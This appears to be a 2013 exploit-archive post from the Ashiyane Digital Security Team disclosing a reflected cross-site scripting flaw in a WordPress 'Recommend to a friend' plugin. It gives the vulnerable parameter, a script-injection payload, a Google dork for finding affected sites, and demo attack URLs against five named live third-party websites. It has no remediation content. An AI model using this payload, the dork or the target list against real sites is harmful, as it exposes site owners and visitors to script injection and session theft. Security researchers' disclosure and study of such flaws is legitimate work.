Home / exploits WordPress Recommend Cross Site Scripting
Posted on 26 December 2013
#################### # Exploit Title : Wordpress Recommend to a friend plugin Cross site scripting # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://wordpress.org/plugins/recommend-a-friend/ # Software Link : http://downloads.wordpress.org/plugin/recommend-a-friend.2.0.2.zip # Google Dork : inurl:wp-content/plugins/recommend-a-friend/inc # Date: 2013-12-23 # Tested on: Windows 7 # discovered by : ACC3SS ------------------------------------------------ # # Exploit : Cross site scripting # # Location : localhost/wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url=[xss] # # Method : Get # # Script For Test : "/><script>alert(1);</script> # ------------------------------------------------ # # Demo: # # http://acpbusinessclimate.org/wordpress/wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url= "/><script>alert(1);</script> # # http://chessmaniac.com/wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url= "/><script>alert(1);</script> # # http://foolsforforests.org/wordpress/wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url= "/><script>alert(1);</script> # # http://thepsychicsline.com/wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url= "/><script>alert(1);</script> # # http://yesmaine.org/wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url= "/><script>alert(1);</script> # ###################### Thanks. -- Best Regards, Ashiyane Digital Security Team http://ashiyane.org/forums
